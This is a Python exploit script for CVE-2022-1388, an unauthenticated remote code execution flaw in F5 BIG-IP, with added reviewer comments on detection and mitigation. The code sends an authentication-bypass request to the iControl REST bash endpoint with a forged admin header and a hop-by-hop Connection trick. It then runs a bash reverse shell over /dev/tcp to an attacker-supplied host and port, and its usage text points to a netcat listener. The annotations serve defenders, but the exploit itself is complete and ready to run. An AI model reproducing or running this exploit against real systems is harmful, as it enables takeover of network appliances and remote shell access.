# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: 16.0.x
# CVE : CVE-2022-1388
#
# Reviewer notes (what a defender can read off this listing):
# - Request shape: a single POST to a URL ending in mgmt/tm/util/bash (an
#   iControl REST path), JSON body {"command": "run", "utilCmdArgs": "-c ..."},
#   `Authorization: Basic YWRtaW46` (base64 of "admin:" - user admin, empty
#   password), `X-F5-Auth-Token: 0`, a `Connection` header that names
#   X-F5-Auth-Token, and no Content-Type header.
# - Detection: any of the above in reverse-proxy, WAF or appliance REST/audit
#   logs is worth alerting on; a `Connection` value that lists an
#   authentication header is not something ordinary API clients send.
# - Host-side effect: utilCmdArgs asks bash on the appliance to open an
#   outbound TCP connection (/dev/tcp/<lhost>/<lport>) with an interactive
#   shell attached, so unexpected egress from the management plane and a bash
#   process holding a network socket are the follow-on signals.
# - Mitigation: install the vendor's fixed release for CVE-2022-1388 and keep
#   the management interface and self-IP access to iControl REST limited to
#   trusted administrative networks.

from requests import Request, Session
import sys
import json  # not referenced anywhere in this listing


def title() -> None:
    """Print the author's banner and contact lines to stdout."""
    # NOTE(review): the banner's original line breaks are not recoverable from
    # this listing; the literal is kept exactly as it appears on the page.
    print('''  __________________ ___ ______ __ ____ ___ ___ / ____\ \/ /____||__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \   | | \ \/ /| |__ ______ ) | | | | ) |) |_____| | __) | (_) | (_) |  | |\ \/ / |__|______/ /| | | |/ // /______| ||__ < > _ < > _ <   | |____ \/| |____/ /_| |_| / /_ / /_| |___) | (_) | (_) | \_____| \/ |______||____|\___/____|____| |_|____/ \___/ \___/  Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''')


def exploit(url: str, lhost: str, lport: str) -> None:
    """Send the CVE-2022-1388 request and print the HTTP status code.

    Args:
        url: Base URL of the appliance; the string 'mgmt/tm/util/bash' is
            appended to it.
        lhost: Address embedded in the /dev/tcp/ path of the command string.
        lport: Port embedded in the same path; must be a string because it is
            concatenated into the command.

    Nothing is returned; the only output is the response status code.
    """
    url = url + 'mgmt/tm/util/bash'
    # Body for the util/bash endpoint: "run" with a `-c` argument string.
    # lhost and lport are concatenated in unescaped.
    data = {
        "command":"run",
        "utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'"
    }
    # 'YWRtaW46' decodes to "admin:" (empty password).
    # NOTE(review): under HTTP semantics a header named in `Connection` is
    # hop-by-hop and is dropped by a forwarding proxy; public write-ups of
    # CVE-2022-1388 attribute the authentication bypass to that behaviour -
    # confirm against the vendor advisory. For detection, this header
    # combination is the most distinctive part of the request.
    headers = {
        'Authorization': 'Basic YWRtaW46',
        'Connection':'keep-alive, X-F5-Auth-Token',
        'X-F5-Auth-Token': '0'
    }
    s = Session()
    req = Request('POST', url, json=data, headers=headers)
    prepped = req.prepare()
    # `json=` makes requests set Content-Type during prepare(); the script
    # removes it again, so the POST carries a JSON body with no Content-Type.
    del prepped.headers['Content-Type']
    resp = s.send(prepped,
        verify=False,  # TLS certificate verification is skipped
        timeout=15
        )
    #print(prepped.headers)
    #print(url)
    #print(resp.headers)
    #print(resp.json())
    print(resp.status_code)


if __name__ == '__main__':
    title()
    # Three positional arguments are required: target URL, lhost, lport.
    if(len(sys.argv) < 4):
        print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0]))
        print('[+] Do not forget to run the listener: nc -lvp 4444\n')
        # Exits with status 0 even though this is the usage-error path.
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2],sys.argv[3])